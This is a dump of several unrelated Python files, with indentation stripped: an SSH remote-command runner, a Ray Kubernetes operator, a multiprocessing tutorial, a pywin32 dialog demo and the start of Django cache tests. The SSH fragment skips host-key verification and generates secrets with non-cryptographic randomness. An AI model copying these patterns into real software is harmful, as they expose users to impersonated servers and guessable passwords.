def cmd_runner(remote_cmd, index, stdout_fh, stderr_fh):
if on_start is not None:
on_start(remote_cmd, index)
header_msg = "Running `%s`" % remote_cmd.full_name
header = [
"=" * len(header_msg),
header_msg,
"=" * len(header_msg),
]
for line in header:
print(line, file=stdout_fh)
print(line, file=stderr_fh)
cmd = remote_cmd.cmd
cmd_args = remote_cmd.cmd_args
for stdout, stderr in cmd.popen(cmd_args).iter_lines():
if stdout:
print(stdout, file=stdout_fh)
stdout_fh.flush()
if stderr:
print(stderr, file=stderr_fh)
stderr_fh.flush()
if on_done is not None:
on_done(remote_cmd, index)
to_run = []
ran = []
with contextlib2.ExitStack() as stack:
for index, remote_cmd in enumerate(remote_cmds):
print("%sRunning %s" % (indent, remote_cmd))
stderr_path = remote_cmd.stderr_path
stderr_fh = safe_open(stderr_path, 'a+b')
stack.callback(stderr_fh.close)
stdout_path = remote_cmd.stdout_path
stdout_fh = safe_open(stdout_path, 'a+b')
stack.callback(stdout_fh.close)
for (kind, filename) in [('stdout', stdout_fh.name),
('stderr', stderr_fh.name)]:
print("%s For watching %s (in real-time)"
" run: `tail -f %s`" % (indent, kind, filename))
to_run.append((remote_cmd,
functools.partial(cmd_runner, remote_cmd,
index, stdout_fh, stderr_fh)))
if max_workers is None:
max_workers = len(to_run)
with Spinner('%sPlease wait' % indent, verbose):
with futurist.ThreadPoolExecutor(max_workers=max_workers) as ex:
for (remote_cmd, run_func) in to_run:
ran.append((remote_cmd, ex.submit(run_func)))
fails = 0
fail_buf = six.StringIO()
for remote_cmd, fut in ran:
fut_exc = fut.exception()
if fut_exc is not None:
fails += 1
fail_buf.write("Running %s failed:\n" % (remote_cmd))
if isinstance(fut_exc, plumbum.ProcessExecutionError):
fail_buf.write(" Due to process execution error:\n")
fail_buf.write(" Exit code: %s\n" % (fut_exc.retcode))
fail_buf.write(" Argv: %s\n" % (fut_exc.argv))
fail_buf.write(" Stdout:\n")
# The end is typically where the error is...
stdout = trim_it(fut_exc.stdout, err_chop_len, reverse=True)
for line in stdout.splitlines():
fail_buf.write(" %s\n" % (line))
fail_buf.write(" Stderr:\n")
stderr = trim_it(fut_exc.stderr, err_chop_len, reverse=True)
for line in stderr.splitlines():
fail_buf.write(" %s\n" % (line))
else:
fail_buf.write("Due to unknown cause: %s\n" % fut_exc)
if fails:
fail_buf = fail_buf.getvalue().rstrip()
raise RemoteExecutionFailed(fail_buf)
class IgnoreMissingHostKeyPolicy(paramiko.MissingHostKeyPolicy):
def missing_host_key(self, client, hostname, key):
# For this programs usage it doesn't currently make sense
# to record these, since they will just keep on changing...
# so just log a note when we get them....
client._log(DEBUG, 'Ignoring %s host key for %s: %s' %
(key.get_name(), hostname, hexlify(key.get_fingerprint())))
def generate_secret(max_len=10):
return "".join(random.choice(PASS_CHARS) for _i in xrange(0, max_len))
def safe_make_dir(a_dir):
try:
os.makedirs(a_dir)
except OSError as e:
if (e.errno == errno.EEXIST and os.path.isdir(a_dir)):
pass
else:
raise
return a_dir
def ssh_connect(ip, connect_timeout=1.0,
max_backoff=60, max_attempts=12, indent="",
user=None, password=None,
server_name=None, verbose=False):
if server_name:
display_name = server_name + " via " + ip
else:
display_name = ip
attempt = 1
connected = False
machine = None
started_at = now()
while not connected:
try:
machine = SshMachine(
ip, connect_timeout=connect_timeout,
missing_host_policy=IgnoreMissingHostKeyPolicy(),
user=user, password=password)
except (plumbum.machines.session.SSHCommsChannel2Error,
plumbum.machines.session.SSHCommsError, socket.error,
paramiko.ssh_exception.AuthenticationException) as e:
if verbose:
print("%sFailed to connect to %s: %s" % (indent,
display_name, e))
backoff = min(max_backoff, 2 ** attempt)
attempt += 1
if attempt > max_attempts:
raise IOError("Could not connect (over ssh) to"
" %s after %i attempts" % (display_name,
attempt - 1))
more_attempts = max_attempts - attempt
if verbose:
print("%sTrying connect to %s again in"
" %s seconds (%s attempts left)..." % (indent,
display_name,
backoff,
more_attempts))
time.sleep(backoff)
else:
ended_at = now()
time_taken = ended_at - started_at
if verbose:
print("%sSsh connected to"
" %s (took %0.2f seconds)" % (indent,
display_name, time_taken))
connected = True
return machine
|
operator.py
|
import asyncio
import logging
import multiprocessing as mp
import os
import threading
from typing import Any
from typing import Callable
from typing import Dict
from typing import Tuple
from typing import Optional
import kopf
import yaml
import ray.autoscaler._private.monitor as monitor
from ray._private import services
from ray.autoscaler._private import commands
from ray.ray_operator import operator_utils
from ray.ray_operator.operator_utils import STATUS_AUTOSCALING_EXCEPTION
from ray.ray_operator.operator_utils import STATUS_RUNNING
from ray.ray_operator.operator_utils import STATUS_UPDATING
from ray import ray_constants
logger = logging.getLogger(__name__)
# Queue to process cluster status updates.
cluster_status_q = mp.Queue() # type: mp.Queue[Optional[Tuple[str, str, str]]]
class RayCluster:
"""Manages an autoscaling Ray cluster.
Attributes:
config: Autoscaling configuration dict.
subprocess: The subprocess used to create, update, and monitor the
Ray cluster.
"""
def __init__(self, config: Dict[str, Any]):
self.config = config
self.name = self.config["cluster_name"]
self.namespace = self.config["provider"]["namespace"]
# Make directory for configs of clusters in the namespace,
# if the directory doesn't exist already.
namespace_dir = operator_utils.namespace_dir(self.namespace)
os.makedirs(namespace_dir, exist_ok=True)
self.config_path = operator_utils.config_path(
cluster_namespace=self.namespace, cluster_name=self.name
)
# Monitor subprocess
# self.subprocess is non-null iff there's an active monitor subprocess
# or a finished monitor subprocess in need of cleanup.
self.subprocess = None # type: Optional[mp.Process]
# Monitor logs for this cluster will be prefixed by the monitor
# subprocess name:
self.subprocess_name = ",".join([self.name, self.namespace])
self.monitor_stop_event = mp.Event()
self.setup_logging()
def create_or_update(self, restart_ray: bool = False) -> None:
"""Create/update the Ray Cluster and run the monitoring loop, all in a
subprocess.
The main function of the Operator is managing the
subprocesses started by this method.
Args:
restart_ray: If True, restarts Ray to recover from failure.
"""
self.do_in_subprocess(self._create_or_update, args=(restart_ray,))
def _create_or_update(self, restart_ray: bool = False) -> None:
try:
self.start_head(restart_ray=restart_ray)
self.start_monitor()
except Exception:
# Report failed autoscaler status to trigger cluster restart.
cluster_status_q.put(
(self.name, self.namespace, STATUS_AUTOSCALING_EXCEPTION)
)
# `status_handling_loop` will increment the
# `status.AutoscalerRetries` of the CR. A restart will trigger
# at the subsequent "MODIFIED" event.
raise
def start_head(self, restart_ray: bool = False) -> None:
self.write_config()
# Don't restart Ray on head unless recovering from failure.
no_restart = not restart_ray
# Create or update cluster head and record config side effects.
self.config = commands.create_or_update_cluster(
self.config_path,
override_min_workers=None,
override_max_workers=None,
no_restart=no_restart,
restart_only=False,
yes=True,
no_config_cache=True,
no_monitor_on_head=True,
)
# Write the resulting config for use by the autoscaling monitor:
self.write_config()
def start_monitor(self) -> None:
"""Runs the autoscaling monitor."""
ray_head_pod_ip = commands.get_head_node_ip(self.config_path)
port = operator_utils.infer_head_port(self.config)
address = services.address(ray_head_pod_ip, port)
mtr = monitor.Monitor(
address,
autoscaling_config=self.config_path,
redis_password=ray_constants.REDIS_DEFAULT_PASSWORD,
prefix_cluster_info=True,
stop_event=self.monitor_stop_event,
retry_on_failure=False,
)
mtr.run()
def teardown(self) -> None:
"""Attempt orderly tear-down of Ray processes before RayCluster
resource deletion."""
self.do_in_subprocess(self._teardown, args=(), block=True)
def _teardown(self) -> None:
commands.teardown_cluster(
self.config_path,
yes=True,
workers_only=False,
override_cluster_name=None,
keep_min_workers=False,
)
def do_in_subprocess(
self, f: Callable[[], None], args: Tuple = (), block: bool = False
) -> None:
# First stop the subprocess if it's alive
self.clean_up_subprocess()
# Reinstantiate process with f as target and start.
self.subprocess = mp.Process(
name=self.subprocess_name, target=f, args=args, daemon=True
)
self.subprocess.start()
if block:
self.subprocess.join()
def clean_up_subprocess(self):
"""
Clean up the monitor process.
Executed when CR for this cluster is "DELETED".
Executed when Autoscaling monitor is restarted.
"""
if self.subprocess is None:
# Nothing to clean.
return
# Triggers graceful stop of the monitor loop.
self.monitor_stop_event.set()
self.subprocess.join()
# Clears the event for subsequent runs of the monitor.
self.monitor_stop_event.clear()
# Signal completed cleanup.
self.subprocess = None
def clean_up(self) -> None:
"""Executed when the CR for this cluster is "DELETED".
The key thing is to end the monitoring subprocess.
"""
self.teardown()
self.clean_up_subprocess()
self.clean_up_logging()
self.delete_config()
def setup_logging(self) -> None:
"""Add a log handler which appends the name and namespace of this
cluster to the cluster's monitor logs.
"""
self.handler = logging.StreamHandler()
# Filter by subprocess name to get this cluster's monitor logs.
self.handler.addFilter(lambda rec: rec.processName == self.subprocess_name)
# Lines start with "<cluster name>,<cluster namespace>:"
logging_format = ":".join([self.subprocess_name, ray_constants.LOGGER_FORMAT])
self.handler.setFormatter(logging.Formatter(logging_format))
operator_utils.root_logger.addHandler(self.handler)
def clean_up_logging(self) -> None:
operator_utils.root_logger.removeHandler(self.handler)
def set_config(self, config: Dict[str, Any]) -> None:
self.config = config
def write_config(self) -> None:
"""Write config to disk for use by the autoscaling monitor."""
with open(self.config_path, "w") as file:
yaml.dump(self.config, file)
def delete_config(self) -> None:
try:
os.remove(self.config_path)
except OSError:
log_prefix = ",".join([self.name, self.namespace])
logger.warning(
f"{log_prefix}: config path does not exist {self.config_path}"
)
@kopf.on.startup()
def start_background_worker(memo: kopf.Memo, **_):
memo.status_handler = threading.Thread(
target=status_handling_loop, args=(cluster_status_q,)
)
memo.status_handler.start()
@kopf.on.cleanup()
def stop_background_worker(memo: kopf.Memo, **_):
cluster_status_q.put(None)
memo.status_handler.join()
def status_handling_loop(queue: mp.Queue):
# TODO: Status will not be set if Operator restarts after `queue.put`
# but before `set_status`.
while True:
item = queue.get()
if item is None:
break
cluster_name, cluster_namespace, phase = item
try:
operator_utils.set_status(cluster_name, cluster_namespace, phase)
except Exception:
log_prefix = ",".join([cluster_name, cluster_namespace])
logger.exception(f"{log_prefix}: Error setting RayCluster status.")
@kopf.on.create("rayclusters")
@kopf.on.update("rayclusters")
@kopf.on.resume("rayclusters")
def create_or_update_cluster(body, name, namespace, logger, memo: kopf.Memo, **kwargs):
"""
1. On creation of a RayCluster resource, create the Ray cluster.
2. On update of a RayCluster resource, update the cluster
without restarting Ray processes,
unless the Ray head's config is modified.
3. On operator restart ("resume"), rebuild operator memo state and restart
the Ray cluster's monitor process, without restarting Ray processes.
"""
_create_or_update_cluster(body, name, namespace, memo, restart_ray=False)
@kopf.on.field("rayclusters", field="status.autoscalerRetries")
def restart_cluster(body, status, name, namespace, memo: kopf.Memo, **kwargs):
"""On increment of status.autoscalerRetries, restart Ray processes.
Increment of autoscalerRetries happens when cluster's monitor fails,
for example due to Ray head failure.
"""
# Don't act on initialization of status.autoscalerRetries from nil to 0.
if status.get("autoscalerRetries"):
# Restart the Ray cluster:
_create_or_update_cluster(body, name, namespace, memo, restart_ray=True)
def _create_or_update_cluster(
cluster_cr_body, name, namespace, memo, restart_ray=False
):
"""Create, update, or restart the Ray cluster described by a RayCluster
resource.
Args:
cluster_cr_body: The body of the K8s RayCluster resources describing
a Ray cluster.
name: The name of the Ray cluster.
namespace: The K8s namespace in which the Ray cluster runs.
memo: kopf memo state for this Ray cluster.
restart_ray: Only restart cluster Ray processes if this is true.
"""
# Convert the RayCluster custom resource to a Ray autoscaling config.
cluster_config = operator_utils.cr_to_config(cluster_cr_body)
# Verify the user didn't set a custom Redis password in Ray start commands.
# (custom Redis password is not supported by K8s operator.)
operator_utils.check_redis_password_not_specified(cluster_config, name, namespace)
# Fetch or create the RayCluster python object encapsulating cluster state.
ray_cluster = memo.get("ray_cluster")
if ray_cluster is None:
ray_cluster = RayCluster(cluster_config)
memo.ray_cluster = ray_cluster
# Indicate in status.phase that a "create-or-update" is in progress.
cluster_status_q.put((name, namespace, STATUS_UPDATING))
# Store the autoscaling config for use by the Ray autoscaler.
ray_cluster.set_config(cluster_config)
# Launch a the Ray cluster by SSHing into the pod and running
# the initialization commands. This will not restart the cluster
# unless there was a failure.
ray_cluster.create_or_update(restart_ray=restart_ray)
# Indicate in status.phase that the head is up and the monitor is running.
cluster_status_q.put((name, namespace, STATUS_RUNNING))
@kopf.on.delete("rayclusters")
def delete_fn(memo: kopf.Memo, **kwargs):
ray_cluster = memo.get("ray_cluster")
if ray_cluster is None:
return
ray_cluster.clean_up()
def main():
if operator_utils.NAMESPACED_OPERATOR:
kwargs = {"namespaces": [operator_utils.OPERATOR_NAMESPACE]}
else:
kwargs = {"clusterwide": True}
asyncio.run(kopf.operator(**kwargs))
if __name__ == "__main__":
main()
|
multi_processing.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Created by yetongxue<me@xander-ye.com>
import time
from concurrent.futures import as_completed,ProcessPoolExecutor,ThreadPoolExecutor
#耗cpu的操作,用多进程编程, 对于io操作来说, 使用多线程编程,进程切换代价要高于线程
def fib(n):
"""计算"""
if n<=2:
return 1
return fib(n-1)+ fib(n-2)
def random_sleep(n):
"""io"""
time.sleep(2)
return n
def process_test(func):
with ProcessPoolExecutor(3) as executor:
all_task=[executor.submit(func,(num)) for num in [30]*10]
start_time=time.time()
for future in as_completed(all_task):
data=future.result()
# print('result:{}'.format(data))
print('process time:{},func:{}'.format(time.time()-start_time,func.__name__))
def thread_test(func):
with ThreadPoolExecutor(3) as executor:
all_task=[executor.submit(func,(num)) for num in [30]*10]
start_time=time.time()
for future in as_completed(all_task):
data=future.result()
# print('result:{}'.format(data))
print('thread time:{},func:{}'.format(time.time()-start_time,func.__name__))
#多进程
import os
def test_fork():
a=1
pid=os.fork()
print('pid:',pid)
if pid==0:
a=a+1
else:
a=a+10
print('a:',a)
"""
pid: 32528
a: 11
pid: 0
a: 2
这里出现两次打印是因为,主线程一直往下运行,打印出0
运行到os.fork()时,会将父进程的数据完整拷贝一份到子进程(进程间数据隔离)
"""
import multiprocessing
def get_html(n):
time.sleep(n)
print('get html end')
return n
def multipricessiong_test():
progress=multiprocessing.Process(target=get_html,args=(2,))
progress.start()
print(progress.pid)
progress.join()
print('main process end')
class ProcessiongTest(multiprocessing.Process):
def run(self):
pass
#进程池
def process_pool():
pool=multiprocessing.Pool(multiprocessing.cpu_count())
#apply_async() 返回 ApplyResult 类似线程的Future
result=pool.apply_async(get_html,args=(3,))
# pool停止接受新任务
pool.close()
#等待所有任务完成
pool.join()
print(result.get())
#imap
pool2 = multiprocessing.Pool(multiprocessing.cpu_count())
for result in pool2.imap(get_html,[1,5,3]):
print('result:{}'.format(result))
if __name__ == '__main__':
# thread_test(fib)
# process_test(fib)
# thread_test(random_sleep)
# process_test(random_sleep)
"""
thread time:3.42461895942688,func:fib
process time:1.5205891132354736,func:fib
thread time:8.015908002853394,func:random_sleep
process time:8.00415587425232,func:random_sleep
"""
# test_fork()
# multipricessiong_test()
process_pool()
|
win32gui_dialog.py
|
# A demo of a fairly complex dialog.
#
# Features:
# * Uses a "dynamic dialog resource" to build the dialog.
# * Uses a ListView control.
# * Dynamically resizes content.
# * Uses a second worker thread to fill the list.
# * Demostrates support for windows XP themes.
# If you are on Windows XP, and specify a '--noxp' argument, you will see:
# * alpha-blend issues with icons
# * The buttons are "old" style, rather than based on the XP theme.
# Hence, using:
# import winxpgui as win32gui
# is recommened.
# Please report any problems.
import sys
if "--noxp" in sys.argv:
import win32gui
else:
import winxpgui as win32gui
import win32gui_struct
import win32api
import win32con, winerror
import struct, array
import commctrl
import Queue
import os
IDC_SEARCHTEXT = 1024
IDC_BUTTON_SEARCH = 1025
IDC_BUTTON_DISPLAY = 1026
IDC_LISTBOX = 1027
WM_SEARCH_RESULT = win32con.WM_USER + 512
WM_SEARCH_FINISHED = win32con.WM_USER + 513
class _WIN32MASKEDSTRUCT:
def __init__(self, **kw):
full_fmt = ""
for name, fmt, default, mask in self._struct_items_:
self.__dict__[name] = None
if fmt == "z":
full_fmt += "pi"
else:
full_fmt += fmt
for name, val in kw.iteritems():
if name not in self.__dict__:
raise ValueError("LVITEM structures do not have an item '%s'" % (name,))
self.__dict__[name] = val
def __setattr__(self, attr, val):
if not attr.startswith("_") and attr not in self.__dict__:
raise AttributeError(attr)
self.__dict__[attr] = val
def toparam(self):
self._buffs = []
full_fmt = ""
vals = []
mask = 0
# calc the mask
for name, fmt, default, this_mask in self._struct_items_:
if this_mask is not None and self.__dict__.get(name) is not None:
mask |= this_mask
self.mask = mask
for name, fmt, default, this_mask in self._struct_items_:
val = self.__dict__[name]
if fmt == "z":
fmt = "Pi"
if val is None:
vals.append(0)
vals.append(0)
else:
# Note this demo still works with byte strings. An
# alternate strategy would be to use unicode natively
# and use the 'W' version of the messages - eg,
# LVM_SETITEMW etc.
val = val + "\0"
if isinstance(val, unicode):
val = val.encode("mbcs")
str_buf = array.array("b", val)
vals.append(str_buf.buffer_info()[0])
vals.append(len(val))
self._buffs.append(str_buf) # keep alive during the call.
else:
if val is None:
val = default
vals.append(val)
full_fmt += fmt
return struct.pack(*(full_fmt,) + tuple(vals))
# NOTE: See the win32gui_struct module for an alternative way of dealing
# with these structures
class LVITEM(_WIN32MASKEDSTRUCT):
_struct_items_ = [
("mask", "I", 0, None),
("iItem", "i", 0, None),
("iSubItem", "i", 0, None),
("state", "I", 0, commctrl.LVIF_STATE),
("stateMask", "I", 0, None),
("text", "z", None, commctrl.LVIF_TEXT),
("iImage", "i", 0, commctrl.LVIF_IMAGE),
("lParam", "i", 0, commctrl.LVIF_PARAM),
("iIdent", "i", 0, None),
]
class LVCOLUMN(_WIN32MASKEDSTRUCT):
_struct_items_ = [
("mask", "I", 0, None),
("fmt", "i", 0, commctrl.LVCF_FMT),
("cx", "i", 0, commctrl.LVCF_WIDTH),
("text", "z", None, commctrl.LVCF_TEXT),
("iSubItem", "i", 0, commctrl.LVCF_SUBITEM),
("iImage", "i", 0, commctrl.LVCF_IMAGE),
("iOrder", "i", 0, commctrl.LVCF_ORDER),
]
class DemoWindowBase:
def __init__(self):
win32gui.InitCommonControls()
self.hinst = win32gui.dllhandle
self.list_data = {}
def _RegisterWndClass(self):
className = "PythonDocSearch"
message_map = {}
wc = win32gui.WNDCLASS()
wc.SetDialogProc() # Make it a dialog class.
wc.hInstance = self.hinst
wc.lpszClassName = className
wc.style = win32con.CS_VREDRAW | win32con.CS_HREDRAW
wc.hCursor = win32gui.LoadCursor( 0, win32con.IDC_ARROW )
wc.hbrBackground = win32con.COLOR_WINDOW + 1
wc.lpfnWndProc = message_map # could also specify a wndproc.
# C code: wc.cbWndExtra = DLGWINDOWEXTRA + sizeof(HBRUSH) + (sizeof(COLORREF));
wc.cbWndExtra = win32con.DLGWINDOWEXTRA + struct.calcsize("Pi")
icon_flags = win32con.LR_LOADFROMFILE | win32con.LR_DEFAULTSIZE
## py.ico went away in python 2.5, load from executable instead
this_app=win32api.GetModuleHandle(None)
try:
wc.hIcon=win32gui.LoadIcon(this_app, 1) ## python.exe and pythonw.exe
except win32gui.error:
wc.hIcon=win32gui.LoadIcon(this_app, 135) ## pythonwin's icon
try:
classAtom = win32gui.RegisterClass(wc)
except win32gui.error, err_info:
if err_info.winerror!=winerror.ERROR_CLASS_ALREADY_EXISTS:
raise
return className
def _GetDialogTemplate(self, dlgClassName):
style = win32con.WS_THICKFRAME | win32con.WS_POPUP | win32con.WS_VISIBLE | win32con.WS_CAPTION | win32con.WS_SYSMENU | win32con.DS_SETFONT | win32con.WS_MINIMIZEBOX
cs = win32con.WS_CHILD | win32con.WS_VISIBLE
title = "Dynamic Dialog Demo"
# Window frame and title
dlg = [ [title, (0, 0, 210, 250), style, None, (8, "MS Sans Serif"), None, dlgClassName], ]
# ID label and text box
dlg.append([130, "Enter something", -1, (5, 5, 200, 9), cs | win32con.SS_LEFT])
s = cs | win32con.WS_TABSTOP | win32con.WS_BORDER
dlg.append(['EDIT', None, IDC_SEARCHTEXT, (5, 15, 200, 12), s])
# Search/Display Buttons
# (x positions don't matter here)
s = cs | win32con.WS_TABSTOP
dlg.append([128, "Fill List", IDC_BUTTON_SEARCH, (5, 35, 50, 14), s | win32con.BS_DEFPUSHBUTTON])
s = win32con.BS_PUSHBUTTON | s
dlg.append([128, "Display", IDC_BUTTON_DISPLAY, (100, 35, 50, 14), s])
# List control.
# Can't make this work :(
## s = cs | win32con.WS_TABSTOP
## dlg.append(['SysListView32', "Title", IDC_LISTBOX, (5, 505, 200, 200), s])
return dlg
def _DoCreate(self, fn):
message_map = {
win32con.WM_SIZE: self.OnSize,
win32con.WM_COMMAND: self.OnCommand,
win32con.WM_NOTIFY: self.OnNotify,
win32con.WM_INITDIALOG: self.OnInitDialog,
win32con.WM_CLOSE: self.OnClose,
win32con.WM_DESTROY: self.OnDestroy,
WM_SEARCH_RESULT: self.OnSearchResult,
WM_SEARCH_FINISHED: self.OnSearchFinished,
}
dlgClassName = self._RegisterWndClass()
template = self._GetDialogTemplate(dlgClassName)
return fn(self.hinst, template, 0, message_map)
def _SetupList(self):
child_style = win32con.WS_CHILD | win32con.WS_VISIBLE | win32con.WS_BORDER | win32con.WS_HSCROLL | win32con.WS_VSCROLL
child_style |= commctrl.LVS_SINGLESEL | commctrl.LVS_SHOWSELALWAYS | commctrl.LVS_REPORT
self.hwndList = win32gui.CreateWindow("SysListView32", None, child_style, 0, 0, 100, 100, self.hwnd, IDC_LISTBOX, self.hinst, None)
child_ex_style = win32gui.SendMessage(self.hwndList, commctrl.LVM_GETEXTENDEDLISTVIEWSTYLE, 0, 0)
child_ex_style |= commctrl.LVS_EX_FULLROWSELECT
win32gui.SendMessage(self.hwndList, commctrl.LVM_SETEXTENDEDLISTVIEWSTYLE, 0, child_ex_style)
# Add an image list - use the builtin shell folder icon - this
# demonstrates the problem with alpha-blending of icons on XP if
# winxpgui is not used in place of win32gui.
il = win32gui.ImageList_Create(
win32api.GetSystemMetrics(win32con.SM_CXSMICON),
win32api.GetSystemMetrics(win32con.SM_CYSMICON),
commctrl.ILC_COLOR32 | commctrl.ILC_MASK,
1, # initial size
0) # cGrow
shell_dll = os.path.join(win32api.GetSystemDirectory(), "shell32.dll")
large, small = win32gui.ExtractIconEx(shell_dll, 4, 1)
win32gui.ImageList_ReplaceIcon(il, -1, small[0])
win32gui.DestroyIcon(small[0])
win32gui.DestroyIcon(large[0])
win32gui.SendMessage(self.hwndList, commctrl.LVM_SETIMAGELIST,
commctrl.LVSIL_SMALL, il)
# Setup the list control columns.
lvc = LVCOLUMN(mask = commctrl.LVCF_FMT | commctrl.LVCF_WIDTH | commctrl.LVCF_TEXT | commctrl.LVCF_SUBITEM)
lvc.fmt = commctrl.LVCFMT_LEFT
lvc.iSubItem = 1
lvc.text = "Title"
lvc.cx = 200
win32gui.SendMessage(self.hwndList, commctrl.LVM_INSERTCOLUMN, 0, lvc.toparam())
lvc.iSubItem = 0
lvc.text = "Order"
lvc.cx = 50
win32gui.SendMessage(self.hwndList, commctrl.LVM_INSERTCOLUMN, 0, lvc.toparam())
win32gui.UpdateWindow(self.hwnd)
def ClearListItems(self):
win32gui.SendMessage(self.hwndList, commctrl.LVM_DELETEALLITEMS)
self.list_data = {}
def AddListItem(self, data, *columns):
num_items = win32gui.SendMessage(self.hwndList, commctrl.LVM_GETITEMCOUNT)
item = LVITEM(text=columns[0], iItem = num_items)
new_index = win32gui.SendMessage(self.hwndList, commctrl.LVM_INSERTITEM, 0, item.toparam())
col_no = 1
for col in columns[1:]:
item = LVITEM(text=col, iItem = new_index, iSubItem = col_no)
win32gui.SendMessage(self.hwndList, commctrl.LVM_SETITEM, 0, item.toparam())
col_no += 1
self.list_data[new_index] = data
def OnInitDialog(self, hwnd, msg, wparam, lparam):
self.hwnd = hwnd
# centre the dialog
desktop = win32gui.GetDesktopWindow()
l,t,r,b = win32gui.GetWindowRect(self.hwnd)
dt_l, dt_t, dt_r, dt_b = win32gui.GetWindowRect(desktop)
centre_x, centre_y = win32gui.ClientToScreen( desktop, ( (dt_r-dt_l)//2, (dt_b-dt_t)//2) )
win32gui.MoveWindow(hwnd, centre_x-(r//2), centre_y-(b//2), r-l, b-t, 0)
self._SetupList()
l,t,r,b = win32gui.GetClientRect(self.hwnd)
self._DoSize(r-l,b-t, 1)
def _DoSize(self, cx, cy, repaint = 1):
# right-justify the textbox.
ctrl = win32gui.GetDlgItem(self.hwnd, IDC_SEARCHTEXT)
l, t, r, b = win32gui.GetWindowRect(ctrl)
l, t = win32gui.ScreenToClient(self.hwnd, (l,t) )
r, b = win32gui.ScreenToClient(self.hwnd, (r,b) )
win32gui.MoveWindow(ctrl, l, t, cx-l-5, b-t, repaint)
# The button.
ctrl = win32gui.GetDlgItem(self.hwnd, IDC_BUTTON_DISPLAY)
l, t, r, b = win32gui.GetWindowRect(ctrl)
l, t = win32gui.ScreenToClient(self.hwnd, (l,t) )
r, b = win32gui.ScreenToClient(self.hwnd, (r,b) )
list_y = b + 10
w = r - l
win32gui.MoveWindow(ctrl, cx - 5 - w, t, w, b-t, repaint)
# The list control
win32gui.MoveWindow(self.hwndList, 0, list_y, cx, cy-list_y, repaint)
# The last column of the list control.
new_width = cx - win32gui.SendMessage(self.hwndList, commctrl.LVM_GETCOLUMNWIDTH, 0)
win32gui.SendMessage(self.hwndList, commctrl.LVM_SETCOLUMNWIDTH, 1, new_width)
def OnSize(self, hwnd, msg, wparam, lparam):
x = win32api.LOWORD(lparam)
y = win32api.HIWORD(lparam)
self._DoSize(x,y)
return 1
def OnSearchResult(self, hwnd, msg, wparam, lparam):
try:
while 1:
params = self.result_queue.get(0)
self.AddListItem(*params)
except Queue.Empty:
pass
def OnSearchFinished(self, hwnd, msg, wparam, lparam):
print "OnSearchFinished"
def OnNotify(self, hwnd, msg, wparam, lparam):
info = win32gui_struct.UnpackNMITEMACTIVATE(lparam)
if info.code == commctrl.NM_DBLCLK:
print "Double click on item", info.iItem+1
return 1
def OnCommand(self, hwnd, msg, wparam, lparam):
id = win32api.LOWORD(wparam)
if id == IDC_BUTTON_SEARCH:
self.ClearListItems()
def fill_slowly(q, hwnd):
import time
for i in range(20):
q.put(("whatever", str(i+1), "Search result " + str(i) ))
win32gui.PostMessage(hwnd, WM_SEARCH_RESULT, 0, 0)
time.sleep(.25)
win32gui.PostMessage(hwnd, WM_SEARCH_FINISHED, 0, 0)
import threading
self.result_queue = Queue.Queue()
thread = threading.Thread(target = fill_slowly, args=(self.result_queue, self.hwnd) )
thread.start()
elif id == IDC_BUTTON_DISPLAY:
print "Display button selected"
sel = win32gui.SendMessage(self.hwndList, commctrl.LVM_GETNEXTITEM, -1, commctrl.LVNI_SELECTED)
print "The selected item is", sel+1
# These function differ based on how the window is used, so may be overridden
def OnClose(self, hwnd, msg, wparam, lparam):
raise NotImplementedError
def OnDestroy(self, hwnd, msg, wparam, lparam):
pass
# An implementation suitable for use with the Win32 Window functions (ie, not
# a true dialog)
class DemoWindow(DemoWindowBase):
def CreateWindow(self):
# Create the window via CreateDialogBoxIndirect - it can then
# work as a "normal" window, once a message loop is established.
self._DoCreate(win32gui.CreateDialogIndirect)
def OnClose(self, hwnd, msg, wparam, lparam):
win32gui.DestroyWindow(hwnd)
# We need to arrange to a WM_QUIT message to be sent to our
# PumpMessages() loop.
def OnDestroy(self, hwnd, msg, wparam, lparam):
win32gui.PostQuitMessage(0) # Terminate the app.
# An implementation suitable for use with the Win32 Dialog functions.
class DemoDialog(DemoWindowBase):
def DoModal(self):
return self._DoCreate(win32gui.DialogBoxIndirect)
def OnClose(self, hwnd, msg, wparam, lparam):
win32gui.EndDialog(hwnd, 0)
def DemoModal():
w=DemoDialog()
w.DoModal()
def DemoCreateWindow():
w=DemoWindow()
w.CreateWindow()
# PumpMessages runs until PostQuitMessage() is called by someone.
win32gui.PumpMessages()
if __name__=='__main__':
DemoModal()
DemoCreateWindow()
|
tests.py
|
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
import copy
import io
import os
import pickle
import re
import shutil
import sys
import tempfile
import threading
import time
import unittest
import warnings
from pathlib import Path
from unittest import mock, skipIf
from django.conf import settings
from django.core import management, signals
from django.core.cache import (
DEFAULT_CACHE_ALIAS, CacheHandler, CacheKeyWarning, InvalidCacheKey, cache,
caches,
)
from django.core.cache.backends.base import InvalidCacheBackendError
from django.core.cache.utils import make_template_fragment_key
from django.db import close_old_connections, connection, connections
from django.db.backends.utils import CursorWrapper
from django.http import (
HttpRequest, HttpResponse, HttpResponseNotModified, StreamingHttpResponse,
)
from django.middleware.cache import (
CacheMiddleware, FetchFromCacheMiddleware, UpdateCacheMiddleware,
)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import engines
from django.template.context_processors import csrf
from django.template.response import TemplateResponse
from django.test import (
RequestFactory, SimpleTestCase, TestCase, TransactionTestCase,
ignore_warnings, override_settings,
)
from django.test.signals import setting_changed
from django.test.utils import CaptureQueriesContext
from django.utils import timezone, translation
from django.utils.cache import (
get_cache_key, learn_cache_key, patch_cache_control, patch_vary_headers,
)
from django.utils.deprecation import RemovedInDjango41Warning
from django.views.decorators.cache import cache_control, cache_page
from .models import Poll, expensive_calculation
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpicklable:
def __getstate__(self):
raise pickle.PickleError()
def empty_response(request):
return HttpResponse()
KEY_ERRORS_WITH_MEMCACHED_MSG = (
'Cache key contains characters that will cause errors if used with '
'memcached: %r'
)
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(SimpleTestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertIsNone(cache.get("key"))
def test_add(self):
"Add doesn't do anything in dummy cache backend"
self.assertIs(cache.add("addkey1", "value"), True)
self.assertIs(cache.add("addkey1", "newvalue"), True)
self.assertIsNone(cache.get("addkey1"))
def test_non_existent(self):
